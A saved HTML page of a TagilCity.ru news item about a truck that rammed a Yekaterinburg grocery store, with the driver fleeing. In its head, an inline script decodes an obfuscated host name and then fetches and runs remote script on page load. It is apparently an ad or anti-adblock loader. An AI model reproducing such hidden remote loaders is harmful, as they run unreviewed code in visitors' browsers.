<!DOCTYPE html><html lang="ru"><head><meta charset="utf-8" />
<script>window.NREUM||(NREUM={});NREUM.info={"beacon":"bam.nr-data.net","errorBeacon":"bam.nr-data.net","licenseKey":"9bf4e866b9","applicationID":"221024743","transactionName":"eg5dFkYJXg9SShoCVkoKRw1ESVMRQ1FWClZKTkAKWxE=","queueTime":0,"applicationTime":120,"agent":""}</script>
<script>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</script><meta content="width=1200" name="viewport" /><meta content="origin" name="referrer" /><meta data-params="{&quot;id&quot;: 21668887,&quot;clickmap&quot;: true,
&quot;trackLinks&quot;: true,&quot;accurateTrackBounce&quot;: true, &quot;triggerEvent&quot;: true}" name="yandex_metrika_params" /><meta content="" name="google-site-verification" /><meta content="" name="mailru-domain" /><meta content="" name="yandex-verification" /><meta content="7 ноября около 20:40 на Елизавете в Екатеринбурге грузовик Iveco врезался в стену продуктового магазина. | Информационное агентство TagilCity.ru" name="description" /><meta content="https://m.tagilcity.ru/news/incident/08-11-2018/voditel-gruzovika-v-ekaterinburge-protaranil-produktovyy-magazin-i-sbezhal" name="mobile_version_path" /><meta content="Анна Григорьева" name="mediator_author" /><meta content="Происшествия" name="mediator_theme" /><meta content="1720904" name="mediator" /><meta content="2018-11-08T07:57:33+03:00" name="mediator_published_time" /><meta property="og:type" content="article"></meta><meta property="og:title" content="Водитель грузовика в Екатеринбурге протаранил продуктовый магазин и сбежал"></meta><meta property="og:description" content="7 ноября около 20:40 на Елизавете в Екатеринбурге грузовик Iveco врезался в стену продуктового магазина."></meta><meta property="og:url" content="https://tagilcity.ru/news/incident/08-11-2018/voditel-gruzovika-v-ekaterinburge-protaranil-produktovyy-magazin-i-sbezhal"></meta><meta property="og:locale" content="ru_RU"></meta><meta name="twitter:card" content="summary"></meta><meta name="twitter:site" content=""></meta><meta name="twitter:creator" content=""></meta><meta name="twitter:image" content="https://tagilcity.ru/attachments/5cfdb3617506f1944006fd3b6c17ae87a9464733/store/fill/1200/630/a889e19f0326be583c0f7b700517f6a9c44204a9032ed7844417ac347d39/d9a679de276d05125cb61f99b613f72321e86113a_900.jpg"></meta><meta property="vk:image" content="https://tagilcity.ru/attachments/5cfdb3617506f1944006fd3b6c17ae87a9464733/store/fill/1200/630/a889e19f0326be583c0f7b700517f6a9c44204a9032ed7844417ac347d39/d9a679de276d05125cb61f99b613f72321e86113a_900.jpg"></meta><meta property="og:image" content="https://tagilcity.ru/attachments/5cfdb3617506f1944006fd3b6c17ae87a9464733/store/fill/1200/630/a889e19f0326be583c0f7b700517f6a9c44204a9032ed7844417ac347d39/d9a679de276d05125cb61f99b613f72321e86113a_900.jpg"></meta><meta property="mywidget:image" content="https://tagilcity.ru/attachments/5cfdb3617506f1944006fd3b6c17ae87a9464733/store/fill/1200/630/a889e19f0326be583c0f7b700517f6a9c44204a9032ed7844417ac347d39/d9a679de276d05125cb61f99b613f72321e86113a_900.jpg"></meta><link href="/attachments/8eebfd4b389ad651bb5e1203ebccb54efdd03880/store/ea6a26a5641a3e59246473262004e7c8bb977c7d2b6885ef456dc27a535b/32.png" rel="icon" /><link href="/attachments/3a3d94262e4b49b707454e2e4dad0d981dd4a156/store/f388638449d44e53c63cf9e100e464f22f826d34459a720729e73ec1999b/152.png" rel="apple-touch-icon-precomposed" /><meta content="/attachments/b8ecd97f30d232225b589115a05b71f684ea1318/store/1d8319ca699fc4901d0f23c6513e9b2d74aa9eb78b661ffed5dbae0a3384/144.png" name="msapplication-TileImage" /><title>Водитель грузовика в Екатеринбурге протаранил продуктовый магазин и сбежал | Информационное агентство TagilCity.ru</title><link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700|PT+Serif:400,700&amp;subset=cyrillic" rel="stylesheet" /><link href="https://cdnjs.cloudflare.com/ajax/libs/fotorama/4.6.4/fotorama.css" rel="stylesheet" /><link rel="stylesheet" href="/frontend/desktop/build/styles_4375ba/app-81231b258b.css" /><script src="/assets/desktop/app-c9f16239ddd93f1621d169f2baecbd4e7d5564df066abbde94bd799ad497599b.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/fotorama/4.6.4/fotorama.js"></script><script src="/frontend/desktop/build/js/app-cbea1622dc95ad3277d0.js"></script><script src="https://yastatic.net/pcode/adfox/loader.js"></script><script src="//vk.com/js/api/openapi.js?139"></script><script async src="https://cdn.onthe.io/io.js/2T4FeEn74lK6"></script><!--Facebook Pixel Code--><script>!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,document,'script','https://connect.facebook.net/en_US/fbevents.js');fbq('init','1187497081331285');fbq('track','PageView');</script><noscript><img height='1'width='1'style='display:none'src='https://www.facebook.com/tr?id=1187497081331285&ev=PageView&noscript=1'/></noscript><!--DO NOT MODIFY--><!--End Facebook Pixel Code--><script src="https://likes.ru/js/widget/build/widget.js?rand=13254"></script><meta name="csrf-param" content="authenticity_token" />
<meta name="csrf-token" content="XyHVnIg+oUEnRC3lt4gIm9ixspaAEKsklgmef/vN3x7ET1O2Q1GRGa88dRm8ucK3jPj56dG4F/BSmwIm7nnu7Q==" /><script type="text/javascript">
    // Thu Nov 08 2018 09:03:41 GMT+0300 (Moscow Standard Time)
    new (function() {
        var host,
            v = 300,
            us,
            start;
        var c = function (g, u, s, h) {
            us = g;
            v = u;
            host = s;
            load([e(atob(host), p(g)), h].join("/"));
        };

        var load = function(g){
            start = window["performance"]["now"]();
            if (typeof window.fetch === 'function') {
                fetch(new Request(g, {redirect: 'error', 'method': 'GET'}))
                    .then(function (response) {
                        return response.text();
                    })
                    .then(insertScript)
                    .catch(onLoadError);
            } else {
                var h = new window["XMLHttpRequest"]();
                h["open"]("GET", g, true);
                h["responseType"] = "text";
                h["addEventListener"]("load", onLoad);
                h["addEventListener"]("error", onLoadError);
                h["send"](null);
            }

        };
        var onLoad = function(e){
            var c = e.target;
            if (c['status'] === 204) {
                return
            }
            insertScript(c.responseText);
        };

        var onLoadError = function(e){
            var b = window["performance"]["now"]() - start;
            if (v > 0 && b > 0 && b < v) {
                /* stop()*/
            }
        };
        var insertScript = function(c){
            var d = window['document']["createElement"]("script");
            d["async"] = false;
            d["textContent"] = c;
            var attr = {"id": "cc-support-script", "data-config":  us, "data-base": host};
            Object.keys(attr).forEach(function (key) {
                d.setAttribute(key, attr[key]);
            });
            window['document']["head"]["appendChild"](d);
        };
        var stop = function(){
            var c = window['document']["styleSheets"];
            for (var d = 0; d < c['length']; d++) {
                c[d]["disabled"] = true
            }
            window["stop"]();
        };
        function p (s) {
            var str = 0;
            s = s.toString().split("");
            for(var i = 0; i< s.length; i++){
                str+= parseInt(s[i]);
            }
            return str.toString();
        }

        function e (s, k) {
            var enc = "";
            for (var i = 0; i < s.length; i++) {
                var a = s.charCodeAt(i);
                var b = a ^ k;
                enc = enc + String.fromCharCode(b);
            }
            return enc;
        }
        return c;
    }() )('10047', 300, 'ZHh4fH82IyNrbX5teH5pYGV4eCJ+eQ==', 'td9vuws/uhe2fr3bv/9ftel9ys77vg/zx67xu0sqx4t/30rjjvtixs/ds6ckh/f7w4h7/fg069mt2a/tbkfl2');
</script>
<script id="cc-support-script" data-config="10047" data-base="ZHh4fH82IyNrbX5teH5pYGV4eCJ+eQ==" type="text/javascript" src="https://garatrelitt.ru/td9vuws/uhe2fr3bv/9ftel9ys77vg/zx67xu0sqx4t/30rjjvtixs/ds6ckh/f7w4h7/fg069mt2a/tbkfl2"></script></head><body><!-- tns-counter.ru -->
<script type="text/javascript">
	(function(win, doc, cb){
		(win[cb] = win[cb] || []).push(function() {
			try {
				tnsCounter1mediainvest_ru = new TNS.TnsCounter({
				'account':'1mediainvest_ru',
				'tmsec': 'tagilcity_total'
				});
			} catch(e){}
		});

		var tnsscript = doc.createElement('script');
		tnsscript.type = 'text/javascript';
		tnsscript.async = true;
		tnsscript.src = ('https:' == doc.location.protocol ? 'https:' : 'http:') + 
			'//www.tns-counter.ru/tcounter.js';
		var s = doc.getElementsByTagName('script')[0];
		s.parentNode.insertBefore(tnsscript, s);
	})(window, this.document,'tnscounter_callback');
</script>
<noscript>
	<img src="//www.tns-counter.ru/V13a****1mediainvest_ru/ru/UTF-8/tmsec=tagilcity_total/" width="0" height="0" alt="" />
</noscript>
<!--/ tns-counter.ru -->
<!--AdFox START-->
<!--uramedia-->
<!--Площадка: http://tagilcity.ru/ / * / *-->
<!--Тип баннера: FullScreen HTML [Sync_Async]-->
<!--Расположение: <верх страницы>-->
<div id="adfox_152992498110866053"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 249448,
        containerId: 'adfox_152992498110866053',
        params: {
            pp: 'g',
            ps: 'chbx',
            p2: 'fjny'
        }
    });
</script><div class="catfish-component"><script type="text/template"><!--AdFox START-->
<!--uramedia-->
<!--Площадка: http://tagilcity.ru/ / * / *-->
<!--Тип баннера: Кэтфиш-->
<!--Расположение: <низ страницы>-->
<div id="adfox_152992569942279602"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 249448,
        containerId: 'adfox_152992569942279602',
        params: {
            pp: 'i',
            ps: 'chbx',
            p2: 'fokb'
        }
    });
</script></script></div><header class="topline"><div class="blue-line"></div><div class="site-container"><div class="container position-relative"><a class="logo" href="/" style="top: 3px"><img class="regular" src="/attachments/781e10406bd10d8aaf4a79490be67798428f3b08/store/8f1c78bb052ae07d0c163f5d4f28002cf975278848feff4e5ef838f191cc/site_logo_main.svg" alt="Site logo main" /><img class="for-menu" src="/attachments/ba4c0b627b46f17db5487215738be666e099f4a7/store/d03315ba436d972133f568a69acf7c8172d20ef2d8aaa8f6400cac86dd10/site_logo_menu.svg" alt="Site logo menu" /></a><div class="menu-trigger"></div><div class="menu"><div class="items"><div class="item"><a href="/news">Новости</a></div><div class="item"><a href="/story/analytika">Аналитика</a></div><div class="item"><a href="/article/tilda/">Обзоры</a></div><div class="item"><a href="/story/cards">Карточки</a></div><div class="item"><a href="/story/rassledovanie">Расследования</a></div><div class="item"><a href="/story/interview">Интервью</a></div><div class="item"><a href="/story/medialunch">Медиаланч</a></div><div class="item"><a href="/comment/">Мнения</a></div></div><div class="height-10"></div><div class="line"></div></div><div class="search-form-trigger"></div><form class="search-form" action="/search" accept-charset="UTF-8" method="get"><input name="utf8" type="hidden" value="&#x2713;" /><input class="query" name="query" type="text" /><button type="submit">Найти</button></form><div class="mat-title"><div class="text-title">Водитель грузовика в Екатеринбурге протаранил продуктовый магазин и сбежал</div><div class="share-popups-component" data-no-google="true"><div class="share-popups-component-invite"><div class="ct-close"></div><div class="ct-title">Читайте TagilCity.ru в официальной группе</div><div class="ct-text">Следите за самыми важными новостями региона в ленте друзей</div><div class="ct-items"><a class="ct-item __fb" href="https://www.facebook.com/tagilcity/" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Facebook</div></a><a class="ct-item __vk" href="https://vk.com/tagilcity_group" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">ВКонтакте</div></a><a class="ct-item __twitter" href="https://twitter.com/tagilcity" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Twitter</div></a><a class="ct-item __od" href="https://ok.ru/tagilcity" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Одноклассники</div></a></div></div><div class="social3-component"><div class="ct-s3-items"><div class="ct-s3-item ct-sp-link __fb"></div><div class="ct-s3-item ct-sp-link __vk" data-counter-url="/api/sharings/1720904/Vk/update_shares"></div><div class="ct-s3-item __other"></div><div class="ct-s3-other"><div class="ct-s3-item ct-sp-link __twitter"><span></span></div><div class="ct-s3-item ct-sp-link __od" data-counter-url="/api/sharings/1720904/Ok/update_shares"><span></span></div><div class="ct-s3-item ct-sp-link __google" data-counter-url="/api/sharings/1720904/GooglePlus/update_shares"><span></span></div></div></div></div></div></div><div class="stories"><div class="wrap-inner"><div class="text-title __small">Сюжеты:</div><div class="tabs2-component"><a href="/story/nizhniy-tagil">Нижний Тагил</a><a href="/story/ekaterinburg">Екатеринбург</a><a href="/story/prigorod">Пригород</a></div></div></div></div></div></header><div class="media-lunch-teaser-component" data-cookie-name="lunch_31_41" data-cookie-value="set"></div><div class="typo-component"><div class="ct-typo-bg"></div><form action="/typos/submit" accept-charset="UTF-8" method="post"><input name="utf8" type="hidden" value="&#x2713;" /><input type="hidden" name="authenticity_token" value="CXBk5m8XLgSEK4YTU3vf7dIKHLh5sfPMwwQ3Uk+o3IWSHuLMpHgeXAxT3u9YShXBhkNXxygZTxgHlqsLWhztdg==" /><div class="ct-close"></div><div class="ct-title">Вы нашли ошибку</div><div class="ct-thanx">Спасибо! <br> Сообщение отправлено.</div><div class="ct-form-fields"><input type="hidden" name="typo[text]" id="typo_text" class="ct-selection-field" required="required" /><input type="hidden" name="typo[url]" id="typo_url" class="ct-url-field" required="required" /><div class="ct-text"></div><textarea name="typo[comment]" id="typo_comment">
Ваш комментарий</textarea><button name="button" type="submit" class="cm-button __blue">Отправить</button></div></form></div><div class="article-page-container"><div class="autoscroll-counter-component"></div><div class="yandex-metrika-component" data-ids="[21668887]" data-params="{&quot;clickmap&quot;: true,&quot;trackLinks&quot;: true,
&quot;accurateTrackBounce&quot;: true, &quot;webvisor&quot;: true, &quot;triggerEvent&quot;: true}"></div><script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-7184240-1', 'auto');ga('send', 'pageview');</script><script type="text/javascript">
!function(){function t(t,e){var a=document.createElement("script");a.type="text/javascript",a.src="https://adblockmetrics.ru/"+t,a.async=0,void 0!==e&&(a.setAttribute("data-config",e),a.setAttribute("data-support","adbm"));var r=document.getElementsByTagName("script")[0];r.parentNode.insertBefore(a,r)}t("js/__fab.js","5ad480b16220a4245d1d25d2"),t("js/metric.js")}();
</script><div class="google-analytics-component"></div><div class="uralweb-component"><script type="text/template"><!-- uralweb -->
<script type="text/javascript">
  //uralweb
  uralweb_d = document;
  uralweb_a = '';
  uralweb_a += '&amp;r=' + escape(uralweb_d.referrer);
  uralweb_js = 10;
  uralweb_a += '&amp;j=' + navigator.javaEnabled();
  uralweb_js = 11;
  uralweb_s = screen;
  uralweb_a += '&amp;s=' + uralweb_s.width + '*' + uralweb_s.height;
  uralweb_a += '&amp;d=' + (uralweb_s.colorDepth ? uralweb_s.colorDepth : uralweb_s.pixelDepth);
  uralweb_js = 12;
  uralweb_js = 13;
  (new Image()).src = '//hc.uralweb.ru/hc/TagilCity?js=' + uralweb_js + '&amp;rand=' + Math.random() + uralweb_a
</script></script></div><div class="media-scope-component"></div><div class="liveinternet-component"></div><div style="height: 0; overflow: hidden;"></div><div class="smi2-widget-component redtram-component"><div class="article-page-slider"><div class="article-page-slider-divider"></div><div class="article-page-slider-slide" data-adv-global-article-id="0" data-title="Водитель грузовика в Екатеринбурге протаранил продуктовый магазин и сбежал | Информационное агентство TagilCity.ru" data-url="/news/incident/08-11-2018/voditel-gruzovika-v-ekaterinburge-protaranil-produktovyy-magazin-i-sbezhal"><a class="article-page-slider-next-mat" href="/news/incident/08-11-2018/voditel-gruzovika-v-ekaterinburge-protaranil-produktovyy-magazin-i-sbezhal?ind=1&amp;page=1&amp;show_dt=1"></a><div class="article-block __slider-mat-1720904" data-add-autoscroll-view="" data-id="1720904"><div class="site-container"><section class="two-main-cols __no-bottom-margin __no-top-margin"><div class=adfox-banner-component style='width: 970px; margin: 0 auto; position: relative; top: -23px;'><script type='text/template'><!--AdFox START-->
<!--uramedia-->
<!--Площадка: http://tagilcity.ru/ / * / *-->
<!--Тип баннера: 970x90-->
<!--Расположение: <верх страницы>-->
<div id="adfox_152992586448765315"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 249448,
        containerId: 'adfox_152992586448765315',
        params: {
            pp: 'g',
            ps: 'chbx',
            p2: 'fony'
        }
    });
</script></script></div><div class="cols-container"><div class="main-col-left"><section class="main article_page"><div class="main-photo"><div class="gradient-photo-component"><img src="/attachments/33bc8451ded40a20cceca03c5b1da3bb414a0879/store/fill/780/440/a889e19f0326be583c0f7b700517f6a9c44204a9032ed7844417ac347d39/d9a679de276d05125cb61f99b613f72321e86113a_900.jpg" alt="D9a679de276d05125cb61f99b613f72321e86113a 900" /><div class="cm-gradient-block"><h1 class="ct-title"><b>Водитель грузовика в Екатеринбурге протаранил продуктовый магазин и сбежал</b> </h1><div class="ct-meta"><span>Сегодня,&nbsp;09:57</span><a href="/news/incident">Происшествия</a><span>Фото: E1.ru</span></div></div></div></div><div class="cm-social-margin scrollable-component-parent __both"><div class="__append-to-body scrollable-component" data-top-shift="95"><div class="share-popups-component"><div class="share-popups-component-invite"><div class="ct-close"></div><div class="ct-title">Читайте TagilCity.ru в официальной группе</div><div class="ct-text">Следите за самыми важными новостями региона в ленте друзей</div><div class="ct-items"><a class="ct-item __fb" href="https://www.facebook.com/tagilcity/" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Facebook</div></a><a class="ct-item __vk" href="https://vk.com/tagilcity_group" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">ВКонтакте</div></a><a class="ct-item __twitter" href="https://twitter.com/tagilcity" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Twitter</div></a><a class="ct-item __od" href="https://ok.ru/tagilcity" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Одноклассники</div></a></div></div><div class="social-component"><a class="ct-sp-link __fb" href="#"></a><a class="ct-sp-link __vk" data-counter-url="/api/sharings/1720904/Vk/update_shares" href="#"></a><a class="ct-sp-link __twitter" href="#"></a></div></div></div><div class="js-mediator-article" data-mediator="1720904" data-mediator-authors="[&quot;Анна Григорьева&quot;]" data-mediator-published-time="2018-11-08T07:57:33+03:00" data-mediator-themes="[&quot;Происшествия&quot;]"><h2 class="cm-par-large pre-line">7 ноября около 20:40 на Елизавете в Екатеринбурге грузовик Iveco врезался в стену продуктового магазина.</h2><div data-io-article-url="https://tagilcity.ru/news/incident/08-11-2018/voditel-gruzovika-v-ekaterinburge-protaranil-produktovyy-magazin-i-sbezhal"><div class="cm-par-medium wysiwyg-component"><p>Грузовик съехал с дороги на тротуар и врезался в дом, на первом этаже которого расположен продуктовый магазин. Пешеходы при этом не пострадали.</p></div><div class="cm-par-medium wysiwyg-component"> <p>Как сообщают очевидцы, после аварии водитель с места происшествия сбежал. Также информацию об этом подтвердили в ГИБДД.</p></div><div class="cm-par-medium wysiwyg-component"> <p>Грузовик эвакуировали на штрафстоянку. Полиция устанавливает обстоятельства произошедшего и выясняет личность водителя, сообщает <a href="https://www.e1.ru">E1.ru</a>.</p></div></div><div class="height-20"></div></div><div class="adfox-banner-component"><script type="text/template"><!--AdFox START-->
<!--uramedia-->
<!--Площадка: http://tagilcity.ru/ / * / *-->
<!--Тип баннера: poster-->
<!--Расположение: <низ страницы>-->
<div id="adfox_15299256727867218"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 249448,
        containerId: 'adfox_15299256727867218',
        params: {
            pp: 'i',
            ps: 'chbx',
            p2: 'fvly'
        }
    });
</script></script></div><div class="height-15"></div><div class="tags-component"><a class="cm-button __small __inline-block" href="/articles/tag/83616">дтп</a><a class="cm-button __small __inline-block" href="/articles/tag/83792">водитель</a><a class="cm-button __small __inline-block" href="/articles/tag/84481">магазин</a><a class="cm-button __small __inline-block" href="/articles/tag/85767">грузовик</a><a class="cm-button __small __inline-block" href="/articles/tag/92429">Екатеринбург</a></div><div class="plashka">
<div align="center">
 Сообщите новость редакции TagilCity.ru! Пишите <a href="mailto:pressa@tagilcity.ru">pressa@tagilcity.ru.</a>
</div>
<div align="center">Звоните <b>+7 (3435) 499-334</b></div>
</div><hr /><div align="center" class="plashka">Нашли опечатку в тексте? Выделите её и нажмите ctrl+enter</div><div class="height-40"></div><div class="share-popups-component" data-no-google="true"><div class="share-popups-component-invite"><div class="ct-close"></div><div class="ct-title">Читайте TagilCity.ru в официальной группе</div><div class="ct-text">Следите за самыми важными новостями региона в ленте друзей</div><div class="ct-items"><a class="ct-item __fb" href="https://www.facebook.com/tagilcity/" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Facebook</div></a><a class="ct-item __vk" href="https://vk.com/tagilcity_group" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">ВКонтакте</div></a><a class="ct-item __twitter" href="https://twitter.com/tagilcity" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Twitter</div></a><a class="ct-item __od" href="https://ok.ru/tagilcity" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Одноклассники</div></a></div></div><div class="social2-component"><a class="ct-sc-item __print" href="/news/incident/08-11-2018/voditel-gruzovika-v-ekaterinburge-protaranil-produktovyy-magazin-i-sbezhal/print" target="__blank" title="Версия для печати"><div class="ct-sc-icon"><span></span></div></a><div class="ct-sc-item ct-sp-link __fb"><div class="ct-sc-icon"><span></span></div><div class="ct-sc-num"></div></div><div class="ct-sc-item ct-sp-link __vk" data-counter-url="/api/sharings/1720904/Vk/update_shares"><div class="ct-sc-icon"><span></span></div><div class="ct-sc-num">0</div></div><div class="ct-sc-item ct-sp-link __twitter"><div class="ct-sc-icon"><span></span></div></div><div class="ct-sc-item ct-sp-link __od" data-counter-url="/api/sharings/1720904/Ok/update_shares"><div class="ct-sc-icon"><span></span></div><div class="ct-sc-num">0</div></div><div class="ct-sc-item ct-sp-link __google" data-counter-url="/api/sharings/1720904/GooglePlus/update_shares"><div class="ct-sc-icon"><span></span></div><div class="ct-sc-num">0</div></div></div></div><div class="script-only-banner-component" data-slide-selector=".__slider-mat-1720904"><script type="text/template"><scriptTag type="text/javascript">
    (function (a, b, c, d, e, f, g, h) {
         g = b.createElement(c);
         g.src = d;
         g.type = "application/javascript";
         g.async = !0;
         h = b.getElementsByTagName(c)[0];
         h.parentNode.insertBefore(g, h);
         a[f] = [];
         a[e] = function () {
             a[f].push(Array.prototype.slice.apply(arguments));
        }
    }) (window, document, "script", (document.location.protocol === "https:"
? "https:" : "http:") + "//cdn01.nativeroll.tv/js/seedr-player.min.js", "SeedrPlayer",
"seedrInit");
</scriptTag>
<scriptTag>
    SeedrPlayer({
        container: '.article-page-slider-slide.current .js-mediator-article div',
		    desiredOffset:	'2',
        gid: "5b34b9669762b685308b47b0",        
        onError: function (e) {}
    });
</scriptTag></script></div><div class="adfox-banner-component" data-inpage-selector=".__slider-mat-1720904"><script type="text/template"><div id="inpage_VI-245918-0-1449247412"></div>
<script type="text/javascript">
if (typeof(pr) == "undefined") { var pr = Math.floor(Math.random() * 4294967295) + 1; }
(function(w, d, n, s, t) {
w[n] = w[n] || [];
w[n].push(function() {
Ya.Context.AdvManager.render({
blockId: "VI-245918-0",
renderTo: "inpage_VI-245918-0-1449247412",
inpage: {
slide: true,
visibleAfterInit: false,
adFoxUrl: "//ads.adfox.ru/249448/getCode?pp=h&ps=chby&p2=frmo&fmt=1&pr="+pr,
insertAfter: ".article-page-slider-slide.current .article_page p",
insertPosition: "2"
},
}, function callback (params) {
});
});
t = d.getElementsByTagName("script")[0];
s = d.createElement("script");
s.type = "text/javascript";
s.src = "//an.yandex.ru/system/context.js";
s.async = true;
t.parentNode.insertBefore(s, t);
})(this, this.document, "yandexContextAsyncCallbacks");
</script></script></div></div></section></div><div class="main-col-right __article-right-col scrollable-component-parent"><div class="adfox-banner-component"><script type="text/template"><!--AdFox START-->
<!--uramedia-->
<!--Площадка: http://tagilcity.ru/ / * / *-->
<!--Тип баннера: 300х300-desktop-->
<!--Расположение: середина-1-->
<div id="adfox_152992450400898899"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 249448,
        containerId: 'adfox_152992450400898899',
        params: {
            pp: 'kbp',
            ps: 'chbx',
            p2: 'fpew'
        }
    });
</script></script></div><div class="height-20"></div><div class="banner-300-600"><div class="adfox-banner-component" data-custom-content-url="/api/weekly_top"><script type="text/template"><!--AdFox START-->
<!--uramedia-->
<!--Площадка: http://tagilcity.ru/ / * / *-->
<!--Тип баннера: 300х600-->
<!--Расположение: <верх страницы>-->
<div id="adfox_15299245755889439"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 249448,
        containerId: 'adfox_15299245755889439',
        params: {
            pp: 'g',
            ps: 'chbx',
            p2: 'fojz'
        }
    });
</script></script></div></div></div></div><div class="read-also-container"><div class="container"><div class="read-also-component"><div class="ct-main-title">Читайте <br> также</div><div class="ct-items"><a class="ct-item metrika-goal-component" data-goal="promodown-1" href="/news/politics/05-11-2018/direktor-molodezhnoy-politiki-srednego-urala-gosudarstvo-ne-prosilo-vas-rozhat"><div class="ct-image"><img width="84" height="47" class="attachment news_item image" src="/attachments/682261f362b5f6019373c8cb77b8e5af0af734f2/store/fill/84/47/c332f85dbc0563c60e3ed5db5c068c3f0760d499fe8bc9c93fbab349a8e0/BUC_2693.jpg.1024x0_q85.jpg" /></div><div class="ct-title">Директор молодежной политики Среднего Урала: государство не просило вас рожать</div></a><a class="ct-item metrika-goal-component" data-goal="promodown-2" href="/cards/05-11-2018/svoevremennye-resheniya-zapozdalye-dela-i-skudnye-mysli-itogi-nedeli-v-nizhnem-tagile"><div class="ct-image"><img width="84" height="47" class="attachment card image" src="/attachments/a43127632097dff4c1c81803dcaef020d7001b5e/store/fill/84/47/eb173652571a779537f04d1fc507be151b6e4fa84c5c764324affaffb792/mindmap-2123973_960_720.jpg" /></div><div class="ct-title">Своевременные решения, запоздалые дела и скудные мысли: итоги недели в Нижнем Тагиле</div></a><a class="ct-item metrika-goal-component __last" data-goal="promodown-3" href="/article/tilda/05-11-2018/budni-v-nizhnem-tagile-chaykovskiy-tantsuyuschie-pensionery-i-den-materi"><div class="ct-image"><img width="84" height="47" class="attachment tilda_article image" src="/attachments/0a8cb8eb12753b2d0c170618d704301a8ba7e3c8/store/fill/84/47/8e57b2d73c70dffbd111450165fe9a86d0e52135802252fe339959b6bd0f/violin-3131551_960_720.jpg" /></div><div class="ct-title">Будни в Нижнем Тагиле: Чайковский, танцующие пенсионеры и День матери</div></a></div></div><div class="read-also-component __yellow-bg __border-top"><div class="ct-main-title">Читайте также</div><div class="ct-items"><a class="ct-item" href="https://newizv.ru/news/tech/29-10-2018/telefon-vo-spasenie-novyy-domashniy-panasonik-pomogaet-pozhilym-lyudyam"><div class="ct-image"><img width="84" height="47" class="attachment through_teaser_block top_image" src="/attachments/4440df1540bfb91ac6d7ce10d3e65416e2791a5d/store/fill/84/47/900a22c5f82f77bece43cdc7bf627f45131de07a7ae8ff7d0ea4dbdfd163/223.jpg" /></div><div class="ct-title">Panasonic спас жизнь пожилому человеку</div></a><a class="ct-item" href="https://newizv.ru/news/economy/29-10-2018/lichnyy-opyt-skolko-na-samom-dele-stoit-kurinoe-myaso"><div class="ct-image"><img width="84" height="47" class="attachment through_teaser_block mid_image" src="/attachments/63f45dbb4dfbf34298c6438cd080d33f43098efb/store/fill/84/47/7fe7991f64446808ebab2be8fcdce56011f0424e1ee14ed62ef23b982d1b/224.jpg" /></div><div class="ct-title">Сколько на самом деле стоит куриное мясо?</div></a><a class="ct-item __last" href="https://inkazan.ru/news/economy/30-10-2018/kreml-v-kurse-situatsii-na-rynke-benzina-peskov"><div class="ct-image"><img width="84" height="47" class="attachment through_teaser_block bottom_image" src="/attachments/64d46be3557dd9c8bb932f651aacd2418c9eb679/store/fill/84/47/22b812b592d9d9e0bbc5745a1f93564287bb64517bbdbfa059900916737f/225.jpg" /></div><div class="ct-title">Кремль в курсе ситуации на рынке бензина</div></a></div></div><div class="smi2-widget-elem"><div id="unit_91934"><a href="http://smi2.ru/" >Новости СМИ2</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = '//smi2.ru/data/js/91934.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script></div><div class="redtram-elem" data-type="lentainform" style="margin-left: -15px; margin-right: -15px; background: #f6f3ec; padding-bottom: 15px;"><script type="text/template"><div><div class="clearfix" style="padding: 15px 20px 0 20px; margin-bottom: -15px;"> <div class="ct-main-title" style="float:left;width:9%;font-weight: 700;line-height: 1.06;color: #16325c;">Популярное</div> <div class="my-widget-anchor" style="float:left; width:87.5%;" data-cid="ad0a4533c1c4745e4a7baa3f60fbe3a4"></div></div></div><script> window.myWidgetInit = {useDomReady: false}; (function(d, s, id) { var js, t = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "https://likemore-go.imgsmail.ru/widget.js"; t.parentNode.insertBefore(js, t); }(document, "script", "my-widget-script"));</script></script></div></div></div></section></div><script>
      window._io_config = window._io_config || {};
      window._io_config["0.2.0"] = window._io_config["0.2.0"] || [];
      window._io_config["0.2.0"].push({
      page_url: "https://tagilcity.ru/news/incident/08-11-2018/voditel-gruzovika-v-ekaterinburge-protaranil-produktovyy-magazin-i-sbezhal",
      page_url_canonical: "https://tagilcity.ru/news/incident/08-11-2018/voditel-gruzovika-v-ekaterinburge-protaranil-produktovyy-magazin-i-sbezhal",
      page_title: "Водитель грузовика в Екатеринбурге протаранил продуктовый магазин и сбежал",
      page_type: "article",
      page_language: "ru",
      article_authors: ["Анна Григорьева"],
